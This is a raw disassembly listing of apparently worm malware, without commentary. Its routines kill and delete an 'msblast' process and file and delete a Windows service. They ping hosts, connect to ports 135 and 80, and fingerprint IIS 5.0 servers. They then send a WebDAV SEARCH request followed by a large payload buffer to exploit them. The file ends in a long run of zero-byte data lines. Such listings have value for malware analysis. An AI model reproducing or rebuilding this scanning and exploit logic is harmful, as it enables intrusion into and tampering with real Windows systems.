var_103 = byte ptr -103h
sub esp, 108h
push esi
push edi
push offset aMsblast ; "msblast"
call sub_401000
add esp, 4
test eax, eax
jz short loc_402A48
push eax
push 0
push 1F0FFFh
call dword_404070 ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_402A48
push 1
push esi
call dword_4040AC ; TerminateProcess
push 1388h
call dword_4040C8 ; Sleep
push esi
call dword_4040E0 ; CloseHandle
loc_402A48: ; CODE XREF: sub_402A00+17�j
; sub_402A00+2B�j
mov ecx, 41h
xor eax, eax
lea edi, [esp+10Ch+var_103]
mov [esp+10Ch+var_104], 0
rep stosd
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
lea eax, [esp+110h+var_104]
push offset aSMsblast_exe ; "%s\\msblast.exe"
push eax
call dword_40411C ; sprintf
add esp, 0Ch
lea ecx, [esp+10Ch+var_104]
push ecx
call dword_404074 ; GetFileAttributesA
pop edi
pop esi
test al, 1
jz short loc_402A91
and al, 0FEh
lea edx, [esp+108h+var_108]
push eax
push edx
call dword_404078 ; SetFileAttributesA
loc_402A91: ; CODE XREF: sub_402A00+81�j
lea eax, [esp+108h+var_108]
push eax
call dword_4040E8 ; DeleteFileA
add esp, 108h
retn
sub_402A00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402AB0 proc near ; CODE XREF: sub_402B20+26�p
; sub_402C40+27�p
arg_0 = dword ptr 4
push esi
push edi
call sub_403122 ; IcmpCreateFile
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_402AC3
pop edi
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_402AC3: ; CODE XREF: sub_402AB0+C�j
push 5Ch
push 40h
call dword_404068 ; GlobalAlloc
mov esi, eax
test esi, esi
jnz short loc_402ADE
push edi
call sub_40311C ; IcmpCloseHandle
pop edi
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_402ADE: ; CODE XREF: sub_402AB0+21�j
mov eax, [esp+8+arg_0]
push ebx
push 7D0h
push 5Ch
push esi
push 0
push 40h
push offset dword_406430
push eax
push edi
mov dword ptr [esi+10h], offset dword_406430
mov word ptr [esi+0Ch], 40h
call sub_403116 ; IcmpSendEcho
push esi
mov ebx, eax
call dword_40406C ; GlobalFree
push edi
call sub_40311C ; IcmpCloseHandle
mov eax, ebx
pop ebx
pop edi
pop esi
retn
sub_402AB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402B20 proc near ; DATA XREF: sub_401470+F0�o
var_414 = word ptr -414h
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_3FC = byte ptr -3FCh
arg_0 = dword ptr 4
sub esp, 414h
push ebp
push esi
push offset dword_4075A4
call dword_404088 ; InterlockedIncrement
mov dword ptr [esp+41Ch+var_414], 0BB8h
mov ebp, [esp+41Ch+arg_0]
mov esi, [ebp+0]
push esi
call sub_402AB0
add esp, 4
test eax, eax
jz loc_402C17
push 87h
mov word ptr [esp+420h+var_410], 2
mov [esp+420h+var_40C], esi
call dword_404174 ; ntohs
push 0
push 1
push 2
mov word ptr [esp+428h+var_410+2], ax
call dword_404150 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_402C17
push ebx
push edi
lea eax, [esp+424h+var_410]
push 10h
push eax
push esi
call dword_404154 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_402C0E
mov ebx, dword_404168
push 0
push 48h
push offset dword_405434
push esi
call ebx ; dword_404168
cmp eax, 0FFFFFFFFh
jz short loc_402C0E
lea ecx, [esp+420h+var_410]
push 4
push ecx
push 1006h
push 0FFFFh
push esi
call dword_404164 ; setsockopt
mov edi, dword_40416C
push 0
lea edx, [esp+424h+var_3FC]
push 3E8h
push edx
push esi
call edi ; dword_40416C
cmp eax, 0FFFFFFFFh
jz short loc_402C0E
test eax, eax
jz short loc_402C0E
mov eax, dword_406420
push 0
push eax
push offset dword_406470
push esi
call ebx ; dword_404168
cmp eax, 0FFFFFFFFh
jz short loc_402C0E
push 0
lea ecx, [esp+424h+var_3FC]
push 400h
push ecx
push esi
call edi ; dword_40416C
loc_402C0E: ; CODE XREF: sub_402B20+7B�j
; sub_402B20+92�j ...
push esi
call dword_404170 ; closesocket
pop edi
pop ebx
loc_402C17: ; CODE XREF: sub_402B20+30�j
; sub_402B20+62�j
test ebp, ebp
jz short loc_402C24
push ebp
call sub_402FC6
add esp, 4
loc_402C24: ; CODE XREF: sub_402B20+F9�j
push offset dword_4075A4
call dword_404064 ; InterlockedDecrement
pop esi
xor eax, eax
pop ebp
add esp, 414h
retn 4
sub_402B20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402C40 proc near ; DATA XREF: sub_401470+E1�o
var_5AC = word ptr -5ACh
var_5A8 = dword ptr -5A8h
var_5A4 = dword ptr -5A4h
var_594 = byte ptr -594h
var_574 = byte ptr -574h
var_2B8 = byte ptr -2B8h
arg_0 = dword ptr 4
sub esp, 5ACh
push ebx
push ebp
push esi
push edi
push offset dword_4075A4
call dword_404088 ; InterlockedIncrement
mov dword ptr [esp+5BCh+var_5AC], 0BB8h
mov eax, [esp+5BCh+arg_0]
mov esi, [eax]
push esi
call sub_402AB0
add esp, 4
test eax, eax
jz loc_402EC5
push 50h
mov word ptr [esp+5C0h+var_5A8], 2
mov [esp+5C0h+var_5A4], esi
call dword_404174 ; ntohs
push 0
push 1
push 2
mov word ptr [esp+5C8h+var_5A8+2], ax
call dword_404150 ; socket
mov ebp, eax
cmp ebp, 0FFFFFFFFh
jz loc_402EC5
lea ecx, [esp+5BCh+var_5A8]
push 10h
push ecx
push ebp
call dword_404154 ; connect
cmp eax, 0FFFFFFFFh
jz loc_402EBE
push esi
call dword_40415C ; inet_ntoa
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
lea edx, [esp+5B8h+var_594]
repne scasb
not ecx
sub edi, ecx
push offset aConnectionKeep ; "\r\nConnection: Keep-Alive\r\n\r\n"
mov eax, ecx
mov esi, edi
mov edi, edx
lea edx, [esp+5BCh+var_574]
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
lea ecx, [esp+5BCh+var_594]
push ecx
push offset aGetHttp1_1Acce ; "GET / HTTP/1.1\r\nAccept: image/gif, imag"...
push offset aSSS ; "%s%s%s"
push edx
call dword_40411C ; sprintf
lea edi, [esp+5CCh+var_574]
or ecx, 0FFFFFFFFh
xor eax, eax
add esp, 14h
repne scasb
not ecx
dec ecx
push 0
lea eax, [esp+5BCh+var_574]
push ecx
push eax
push ebp
call dword_404168 ; send
cmp eax, 0FFFFFFFFh
jz loc_402EBE
mov ebx, dword_404164
lea ecx, [esp+5B8h+var_5A8]
push 4
push ecx
push 1006h
push 0FFFFh
push ebp
call ebx ; dword_404164
push 0
lea edx, [esp+5BCh+var_2B8]
push 2BBh
push edx
push ebp
call dword_40416C ; recv
cmp eax, 0FFFFFFFFh
jz loc_402EBE
test eax, eax
jz loc_402EBE
mov [esp+eax+5B8h+var_2B8], 0
lea eax, [esp+5B8h+var_2B8]
push offset aServerMicrosof ; "Server: Microsoft-IIS/5.0"
push eax
call dword_404100 ; strstr
add esp, 8
test eax, eax
jz loc_402EBE
push ebp
call dword_404170 ; closesocket
mov esi, dword_4040C8
push 64h
call esi ; dword_4040C8
push 0
push 1
push 2
call dword_404150 ; socket
mov ebp, eax
cmp ebp, 0FFFFFFFFh
jz loc_402EC5
lea ecx, [esp+5BCh+var_5A8]
push 10h
push ecx
push ebp
call dword_404154 ; connect
cmp eax, 0FFFFFFFFh
jz loc_402EBE
lea edx, [esp+5B8h+var_594]
lea eax, [esp+5B8h+var_574]
push edx
push offset aSearchHttp1_1H ; "SEARCH / HTTP/1.1\r\nHost: %s\r\n\r\n"
push eax
call dword_40411C ; sprintf
lea edi, [esp+5C4h+var_574]
or ecx, 0FFFFFFFFh
xor eax, eax
add esp, 0Ch
repne scasb
not ecx
dec ecx
push 0
push ecx
lea ecx, [esp+5C0h+var_574]
push ecx
push ebp
call dword_404168 ; send
cmp eax, 0FFFFFFFFh
jz loc_402EBE
lea edx, [esp+5B8h+var_5A8]
push 4
push edx
push 1006h
push 0FFFFh
push ebp
call ebx ; dword_404164
push 0
lea eax, [esp+5BCh+var_2B8]
push 63h
push eax
push ebp
call dword_40416C ; recv
cmp eax, 0FFFFFFFFh
jz short loc_402EBE
test eax, eax
jz short loc_402EBE
lea ecx, [esp+5B8h+var_2B8]
push offset a411 ; "411"
push ecx
mov [esp+eax+5C0h+var_2B8], 0
call dword_404100 ; strstr
add esp, 8
test eax, eax
jz short loc_402EBE
push ebp
call dword_404170 ; closesocket
push 64h
call esi ; dword_4040C8
push 0
push 1
push 2
call dword_404150 ; socket
mov ebp, eax
cmp ebp, 0FFFFFFFFh
jz short loc_402EC5
lea edx, [esp+5BCh+var_5A8]
push 10h
push edx
push ebp
call dword_404154 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_402EBE
push 64h
call esi ; dword_4040C8
mov edx, ds:dword_4075A0
or ecx, 0FFFFFFFFh
mov edi, edx
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx
push edx
push ebp
call sub_402F50
add esp, 0Ch
push 0BB8h
call esi ; dword_4040C8
loc_402EBE: ; CODE XREF: sub_402C40+77�j
; sub_402C40+E9�j ...
push ebp
call dword_404170 ; closesocket
loc_402EC5: ; CODE XREF: sub_402C40+31�j
; sub_402C40+60�j ...
mov eax, [esp+5BCh+arg_0]
pop edi
pop esi
pop ebp
test eax, eax
pop ebx
jz short loc_402EDD
push eax
call sub_402FC6
add esp, 4
loc_402EDD: ; CODE XREF: sub_402C40+292�j
push offset dword_4075A4
call dword_404064 ; InterlockedDecrement
xor eax, eax
add esp, 5ACh
retn 4
sub_402C40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402F00 proc near ; CODE XREF: sub_401280+3C�p
; sub_401280+46�p
arg_0 = dword ptr 4
push esi
push edi
push 0F003Fh
push 0
push 0
call dword_40402C ; OpenSCManagerA
mov edi, eax
test edi, edi
jz short loc_402F4B
mov eax, [esp+8+arg_0]
push 0F01FFh
push eax
push edi
call dword_404038 ; OpenServiceA
mov esi, eax
test esi, esi
jnz short loc_402F38
push edi
call dword_404034 ; CloseServiceHandle
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_402F38: ; CODE XREF: sub_402F00+2C�j
push esi
call dword_40400C ; DeleteService
push esi
mov esi, dword_404034
call esi ; dword_404034
push edi
call esi ; dword_404034
loc_402F4B: ; CODE XREF: sub_402F00+15�j
pop edi
pop esi
retn
sub_402F00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402F50 proc near ; CODE XREF: sub_402C40+26F�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ecx
push ebx
push ebp
push esi
push edi
mov edi, [esp+14h+arg_8]
xor ebx, ebx
cmp edi, ebx
mov [esp+14h+var_4], edi
mov [esp+14h+arg_8], ebx
jle short loc_402FA3
mov ebp, [esp+14h+arg_4]
loc_402F6B: ; CODE XREF: sub_402F50+51�j
mov ecx, [esp+14h+arg_0]
push 0
lea eax, [ebx+ebp]
push edi
push eax
push ecx
call dword_404168 ; send
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_402FAD
test esi, esi
jnz short loc_402F9B
cmp [esp+14h+arg_8], 64h
jge short loc_402FAD
push 5
call dword_4040C8 ; Sleep
inc [esp+14h+arg_8]
loc_402F9B: ; CODE XREF: sub_402F50+36�j
sub edi, esi
add ebx, esi
test edi, edi
jg short loc_402F6B
loc_402FA3: ; CODE XREF: sub_402F50+15�j
mov eax, [esp+14h+var_4]
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_402FAD: ; CODE XREF: sub_402F50+32�j
; sub_402F50+3D�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
pop ecx
retn
sub_402F50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402FC0 proc near ; CODE XREF: sub_401280+8B�p
; sub_401470+9B�p ...
jmp dword_404108
sub_402FC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402FC6 proc near ; CODE XREF: sub_401C80+1EA�p
; sub_402B20+FC�p ...
jmp dword_404138
sub_402FC6 endp
; ---------------------------------------------------------------------------
loc_402FCC: ; CODE XREF: seg001:004091B8�j
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4041A8
push offset loc_403100
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 20h
push ebx
push esi
push edi
mov [ebp-18h], esp
and dword ptr [ebp-4], 0
push 1
call dword_404128 ; __set_app_type
pop ecx
or ds:dword_4076BC, 0FFFFFFFFh
or ds:dword_4076C0, 0FFFFFFFFh
call dword_404124 ; __p__fmode
mov ecx, ds:dword_4076B8
mov [eax], ecx
call dword_404118 ; __p__commode
mov ecx, ds:dword_4076B4
mov [eax], ecx
mov eax, dword_404114
mov eax, [eax]
mov ds:dword_4076C4, eax
call nullsub_1
cmp dword_406414, 0
jnz short loc_40304F
push offset sub_4030FA
call dword_404110 ; __setusermatherr
pop ecx
loc_40304F: ; CODE XREF: seg000:00403041�j
call sub_4030E8
push offset dword_40500C
push offset dword_405008
call sub_4030E2 ; _initterm
mov eax, ds:dword_4076B0
mov [ebp-28h], eax
lea eax, [ebp-28h]
push eax
push ds:dword_4076AC
lea eax, [ebp-20h]
push eax
lea eax, [ebp-2Ch]
push eax
lea eax, [ebp-1Ch]
push eax
call dword_4040F8 ; __getmainargs
push offset dword_405004
push offset dword_405000
call sub_4030E2 ; _initterm
call dword_40410C ; __p___initenv
mov ecx, [ebp-20h]
mov [eax], ecx
push dword ptr [ebp-20h]
push dword ptr [ebp-2Ch]
push dword ptr [ebp-1Ch]
call sub_4011C0
add esp, 30h
mov [ebp-24h], eax
push eax
call dword_4040F0 ; exit
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-30h], ecx
push eax
push ecx
call sub_4030DC ; _XcptFilter
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-30h]
call dword_404134 ; _exit
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4030DC proc near ; CODE XREF: seg000:004030C8�p
jmp dword_4040F4
sub_4030DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4030E2 proc near ; CODE XREF: seg000:0040305E�p
; seg000:00403091�p
jmp dword_4040FC
sub_4030E2 endp
; =============== S U B R O U T I N E =======================================
sub_4030E8 proc near ; CODE XREF: seg000:loc_40304F�p
push 30000h
push 10000h
call sub_403106 ; _controlfp
pop ecx
pop ecx
retn
sub_4030E8 endp
; =============== S U B R O U T I N E =======================================
sub_4030FA proc near ; DATA XREF: seg000:00403043�o
xor eax, eax
retn
sub_4030FA endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
align 10h
loc_403100: ; DATA XREF: seg000:00402FD6�o
jmp dword_40412C
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403106 proc near ; CODE XREF: sub_4030E8+A�p
jmp dword_404130
sub_403106 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403110 proc near ; CODE XREF: sub_4016E0+10�p
jmp dword_40419C
sub_403110 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403116 proc near ; CODE XREF: sub_402AB0+53�p
jmp dword_404058
sub_403116 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40311C proc near ; CODE XREF: sub_402AB0+24�p
; sub_402AB0+62�p
jmp dword_404050
sub_40311C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403122 proc near ; CODE XREF: sub_402AB0+2�p
jmp dword_404054
sub_403122 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403128 proc near ; CODE XREF: sub_401006+BA�p
jmp dword_4040DC
sub_403128 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40312E proc near ; CODE XREF: sub_401006+76�p
jmp dword_4040D8
sub_40312E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403134 proc near ; CODE XREF: sub_401006+5C�p
jmp dword_4040D4
sub_403134 endp
; ---------------------------------------------------------------------------
align 4
dd 96h dup(0)
db 0
dword_403395 dd 0 align 4
dd 11h dup(0)
db 2 dup(0)
dword_4033E2 dd 0 align 4
db 0
dword_4033E9 dd 0 align 10h
dd 0
db 2 dup(0)
dword_4033F6 dd 0 align 4
dd 0Bh dup(0)
db 0
byte_403429 db 0 ; DATA XREF: seg002:0040B97D�r
; seg002:loc_40B997�r ...
byte_40342A db 0 ; DATA XREF: seg002:0040B9C9�r
; seg002:loc_40B9E4�r ...
byte_40342B db 0 ; DATA XREF: seg002:0040B927�r
; seg002:0040B930�r ...
db 3 dup(0)
byte_40342F db 0 ; DATA XREF: seg002:0040B919�r
; seg002:0040B93A�r ...
byte_403430 db 0 ; DATA XREF: seg002:0040BB5F�r
; sub_40C22E+73�w ...
dword_403431 dd 0 ; sub_40A3C1+BE�r ...
dword_403435 dd 0 align 4
dword_40343C dd 0 ; seg002:loc_40B7D4�r ...
dd 3Fh dup(0)
dword_40353C dd 0 ; sub_40A3C1:loc_40A3EE�r ...
dword_403540 dd 0 ; sub_40A43F+11�r
dword_403544 dd 0 ; sub_40A3C1+13�r
dword_403548 dd 0 ; sub_40A824+3�r ...
dd 0
dword_403550 dd 0 ; seg002:0040A53B�r ...
align 8
dword_403558 dd 0 dword_40355C dd 5 dup(0) dword_403570 dd 0 dd 8 dup(0)
dword_403594 dd 0 ; seg002:0040B05A�r
dword_403598 dd 0Ch dup(0) dword_4035C8 dd 0 align 10h
dword_4035D0 dd 0 dword_4035D4 dd 0 ; seg002:loc_40AC5A�r
dword_4035D8 dd 0 ; seg002:0040AC7C�r
dword_4035DC dd 0 ; seg002:0040AC8D�r
dword_4035E0 dd 0 dword_4035E4 dd 0 ; seg002:0040AC34�r
dword_4035E8 dd 0 ; seg002:0040AC6B�r
dd 3 dup(0)
dword_4035F8 dd 0 dd 12h dup(0)
db 2 dup(0)
dword_403646 dd 0 db 0
db 0
db 2 dup(0)
dword_40364E dd 0 align 4
dd 0CAh dup(0)
db 2 dup(0)
dword_40397E dd 0 ; sub_40A3C1+DA�w ...
dword_403982 dd 0 ; seg002:0040BCF6�r ...
dword_403986 dd 0 ; seg002:0040BDE4�r ...
dword_40398A dd 0 ; seg002:0040BBBC�w ...
dword_40398E dd 0 ; sub_40B5F2+6�w ...
dword_403992 dd 0 dword_403996 dd 0 dword_40399A dd 0 ; seg002:0040BD55�r
dword_40399E dd 0 ; seg002:0040B8E4�r
dword_4039A2 dd 0 ; seg002:0040BDCC�r
dword_4039A6 dd 0 ; sub_40B53C+30�w ...
dword_4039AA dd 0 ; sub_40B53C+36�w ...
unk_4039AE db 0 ; DATA XREF: sub_40BE02+2�r
; sub_40BFBB+4B�w ...
db 0
db 2 dup(0)
dword_4039B2 dd 0 dword_4039B6 dd 0 dword_4039BA dd 0 dword_4039BE dd 0 dword_4039C2 dd 0 dword_4039C6 dd 0 dword_4039CA dd 0 ; sub_40BFBB-15�r
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
